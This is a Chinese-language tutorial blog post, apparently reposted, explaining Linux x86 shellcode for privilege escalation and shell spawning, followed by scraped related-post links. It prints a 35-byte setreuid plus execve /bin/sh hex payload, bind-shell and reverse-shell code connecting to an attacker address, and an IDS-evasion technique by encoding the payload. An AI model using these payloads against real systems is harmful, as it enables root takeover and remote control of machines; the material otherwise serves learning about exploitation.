了解黑客的关键工具---揭开Shellcode的神秘面纱
2019独角兽企业重金招聘Python工程师标准>>>
ref: http://zhaisj.blog.51cto.com/219066/61428/
了解黑客的关键工具---揭开Shellcode的神秘面纱
对于初期接触网络安全的人来说,Shellcode是很神秘的东西,对于网络攻击过程中的嗅探信息、漏洞剖析都是可以理解的,但真正利用漏洞入侵时,通过把一段二进制码送入后并执行,就可以获得目标机器的控制权,之后的事情是属于爱好者学习技术,还是黑客的行为,就看攻击者的一念之差了。Shellcode就好象神秘的武器,安全防护变得如此不堪一击。Shellcode究竟是什么样的程序?是什么特殊代码?如何才能学会编写?我下面收集了几类常见的Shellcode,主要是学习使用。它其实也是一般的软件程序,主要是因为二进制码的“不可读性”,增加了神秘色彩。
Shellcode是指能完成特殊任务的自包含的二进制代码,根据不同的任务可能是发出一条系统调用或建立一个高权限的Shell,Shellcode也就由此得名。它的最终目的是取得目标机器的控制权,所以一般被攻击者利用系统的漏洞送入系统中执行,从而获取特殊权限的执行环境,或给自己设立有特权的帐户。Shellcode因操作系统有一些差异,这里以Linux为例。
Shellcode是一段高技巧的软件代码,为了小而精,一般直接写为16进制的操作码,当然编写者一般采用C或汇编编写,然后通过汇编程序成为16进制的操作码。
1、获取特殊权限:攻击的目标通常是某个SUID(具有高权限的系统程序)程序,因为它可以具有较高的特权去执行一些命令(比如修口令等),好的SUID程序会在不必要时放弃过高的特权,需要时再重新设置获取特权。Setreuid是用来设置(恢复)进程的真实和有效的用户ID。当然也就可以设置root(0)的权限。
xor ebx,ebx 参数一:真实用户id(ruid)=0
xor ecx,ecx 参数二:有效用户id(euid)=0
xor eax,eax
mov al,0x46 系统调用0x46
int 0x80 设置setreuid(0,0)
有了root(0)用户权限,系统基本就归你指挥了。
2、执行/bin/sh: 有了特权,还要有个“工作室”,shell是Linux常用的控制台,取得一个有特权的shell,就可以让你“随意”工作了。建立一个shell并不复杂,一般采用execve调用执行/bin/sh软件
char *shell[2];
shell[0]=”/bin/sh”;
shell[1]=0;
execve(shell[0],shell,NULL);
该调用C语言编写很简单,对应的汇编代码也不复杂:
xor eax,eax eax=0
push eax eax=null
push 0x68732f2f 压栈 //sh
push 0x6e69622f 压栈 /bin
mov ebx,esp ebx=esp指向/bin/sh
push eax eax=null 结束栈null
push ebx 参数2 ebx指向/bin/sh
mov ecx,esp 参数3 ecx指向[“/bin/sh”,NULL]
xor edx,edx 参数4 edx=NULL
mov al,0xb 参数1 eax=0xb
int 0x80
综合以上两个部分,就是最常见的Shellcode了,具体生成的16进制代码如下(共35个字节):
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80 ;setreuid(0,0)
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1
\x31\xd2\xb0\x0b\xcd\x80 ;执行/bin/sh
该代码可以放置在缓冲区内,通过指针函数调用执行。在缓冲区溢出等方式获得执行权利时,运行该段代码就可以打开一个具有root(0)权限的shell界面。
Shellcode在不同的场合,可能有严格的限制,比如在命令行溢出漏洞时,不能太大,没有有效的空间来存放代码,所以要严格精简代码的长度。在SQL注入时对长度的要求更加苛刻,所以很多业界流行的、优秀的Shellcode是经过各种技巧精练的结果。Shellcode是攻击注入代码的统称,并非一定是打开Shell,根据漏洞程序本身的特性有很多的改变,有兴趣的朋友可以从网上收集。
3、绑定到端口的Shellcode
用shellcode在目标计算机上打开一个端口(通讯服务),并将Shell绑定到该端口,攻击者可以放弃入侵时的用的端口,等于在目标机器上建立了系统的后门。该端口可以为入侵者随时建立连接,因为是打开了shell,所以等于建立远程控制目标的控制台。
开启服务离不开Socket,Socket定义为一个端口和一个IP到一个进程的绑定。
a) 建立本地IP Socket,TCP
int server
server=socket(2,1,0)
b) 用IP和端口建立一个Sockaddr_in结构
struct sockaddr_in server_addr
server_addr.sin_addr.s_addr=0 socket的地址设为本地地址
server_addr.sin_port=0xBBBB socket的端口设为0xBBBB=48059
server_addr.sin_family=2 协议族为IP
c) 将端口和IP绑定到Socket上
bind(server, (struct sockaddr *)&server_addr, 0x10)
d) 以监听模式启动socket:打开端口并等待连接
listen(server, 0)
e) 有连接时,向客户返回一个句柄
int client
client=accept(server, 0, 0)
f) 将返回的句柄,复制到stdin、stdout、stderr,shell输出到攻击者(client)的屏幕
dup2(client,0)
dup2(client,1)
dup2(client,2)
g) 调用普通的execve执行shellcode
char *shell[2];
shell[0]=”/bin/sh”
shell[1]=0
execve(shell[0], shell, 0)
4、反向连接的shellcode
当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用上边的shellcode建立了服务后门,你还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接。
很多木马就利用这种方式,主动连接带木马的管理者,“神不知,鬼不觉”地把目标计算机加入到某个“僵尸网络”的黑社会团伙中。
a) 建立本地IP Socket,TCP
int soc
soc=socket(2,1,0)
b) 用IP和端口建立一个Sockaddr_in结构
struct sockaddr_in server_addr
server_addr.sin_addr.s_addr=0x660A0A0A socket的地址设为10.10.10.102
server_addr.sin_port=0xBBBB socket的端口设为0xBBBB=48059
server_addr.sin_family=2 协议族为IP
c) 建立反向连接connect
int remote
remote=connect(soc, (struct sockaddr*)&server_addr, 0x10)
d) 将socket复制到stdin、stdout、stderr,shell输出到攻击者的屏幕
dup2(soc,0)
dup2(soc,1)
dup2(soc,2)
e) 调用普通的execve执行shellcode
char *shell[2];
shell[0]=”/bin/sh”
shell[1]=0
execve(shell[0], shell, 0)
注意:10.10.10.102为防火墙外攻击机器的地址,此时在该机器上要启动一个监听48059端口的服务
5、躲避IDS的过滤
由于经典的Shellcode并不是有很多的版本,大多数人员都是采用同样的Shellcode,很少有人自己编写。所以IDS厂商把常见的Shellcode的指纹提取出来,作为验证攻击行为的“特征”,很多攻击行为就暴露在IDS的监控之下,网络管理人员可以很快知道你到了他的网络内部,进而采取“捕获”措施。
所以,隐藏指纹,变换代码,Shellcode也在不断更新。技术很多,这里就不例举了,提一个有意思的思路:因为Shellcode的基本功能相同,都是诱使目标机器执行这些指令,目标代码在传输和存放时是很容易被IDS或系统察觉的,那么直到被执行前才恢复原来面貌是一个好注意。所以有人通过把代码简单移位,“加密”后的代码没有任何“意义”,到执行前再反向移位,被检测到的概率就小多了,这种方式对躲避IDS是很有效果的。
转载于:https://my.oschina.net/Bruce370/blog/333043
了解黑客的关键工具---揭开Shellcode的神秘面纱相关推荐
- 揭开木马的神秘面纱 2
揭开木马的神秘面纱zz 2 离冰河二的问世已经快一年了,大家对于木马这种远程控制软件也有了一定的认 识,比如:他会改注册表,他会监听端口等等,和一年前几乎没有人懂得木马是什么东 西相比,这是一个质 ...
- Azure Stack技术深入浅出系列6:Azure Stack一体机探究 — 揭开黑盒子的神秘面纱
Azure Stack是微软公有云平台的延伸,为客户环境里提供接口和相关的功能.微软的Azure Stack安装在指定的合作伙伴的一体机中,并以一体机的形式部署到客户的混合云应用环境里的.2017年7 ...
- [转]揭开正则表达式的神秘面纱
揭开正则表达式的神秘面纱 关闭高亮 [原创文章,转载请保留或注明出处:http://www.regexlab.com/zh/regref.htm] 引言 正则表达式(regular expressio ...
- 揭开PC-Lint9的神秘面纱
前言 今天,又定位了一个令人懊恼的C++内存使用异常问题,最终结果,竟然是减少接口类的方法后,为了避免编译错误,顺手添加的强制类型转换导致的. 对于这样的问题,我们碰到很多很多次了.没有这样的问题,我 ...
- 未来已来?揭开量子计算机的神秘面纱
从第一台现代计算机ENIAC的诞生到个人PC时代的降临,从互联网概念的提出到移动互联的疾跑,在这个信息年代里,变革正以前所未有的速度改变着我们熟悉的世界.熟悉的生活. 作为个人,我们早已习惯于智能计算 ...
- 冰河浅析 - 揭开木马的神秘面纱(下)
冰河浅析 - 揭开木马的神秘面纱(下) 作者:· shotgun·yesky 四.破解篇(魔高一尺.道高一丈) 本文主要是探讨木马的基本原理, 木马的破解并非是 ...
- 【翻译】揭开HTML5的神秘面纱
写在前面的话: 这篇文章摘自Mozilla官网,主要针对HTML5和本地应用发表了一些.没有设计到技术,所以基本是逐字翻译,但愿我蹩脚的英语水平能把大师的 Chris Heilmann的思想整理明白. ...
- 初识5G - 揭开5G的神秘面纱 从零开始学习
揭开5G的神秘面纱 前言 一.移动通信的发展历程 二.5G的技术指标 | 应用场景 (1)七大关键技术指标 (2)应用场景 VR虚拟现实(Virtual Reality) AR增强现实(Augment ...
- 揭开木马的神秘面纱 1
揭开木马的神秘面纱 1 前言 在网上,大家最关心的事情之一就是木马:最近出了新的木马吗?木马究竟能实现 哪些功能?木马如何防治?木马究竟是如何工作的?本文试图以我国最著名的木马之 - 冰河为例,向大 ...
最新文章
- Latex 实时排版工具
- spring中bean的高级属性之list, set, map以及props元素(含举例)
- LIBGDX游戏引擎平台介绍与搭建
- java 十进制转十六进制、十进制转二进制、二进制转十进制、二进制转十六进制...
- Sky Line 与 ArcEngine的粘合剂 Composite UI AB?
- des 向量 java_在JAVA中使用DES算法
- Linux查找大文件 (find的用法)
- oracle indices,Oracle PL/SQL INDICES
- MacOS磁盘工具:如何将“校验和..“添加到磁盘映像
- 莽荒纪手游源码/服务端!
- 24种常见的逻辑关系谬误
- 空间数据分析以及QGIS数据加载
- CDN工作过程及工作原理
- ubuntu18.04修改mac地址
- ubuntu展示点云使用boost::this_thread报错
- 风险模型为什么是量化投资成功的关键?
- Anno六轴机械臂solidworks转urdf
- php $a=3,<?php$a=1;$b=2;$c=3;($a=4)?($b++):($c++);echo$a,$b,$c;?>输出结果为
- SKLEARN-3-随机森林
- access内置函数:(适用access2000)-…
热门文章
- php 的webservice类库NuSoap介绍
- .htaccess的重写规则
- nginx 反向代理,动静态请求分离,proxy_cache缓存及缓存清除
- 用C#实现在PowerPoint文档中搜索文本
- 如何在域控制器上安装asp.net?
- 开源库libuuid简介及使用
- Linux下__attribute__((visibility (default)))的使用
- 正则表达式简介及在C++11中的简单使用
- OpenCV中响应鼠标信息cvSetMouseCallback函数的使用
- 【数据库】sqlite中的限制:数据库大小、表数、列数、行数、参数个数、连接数等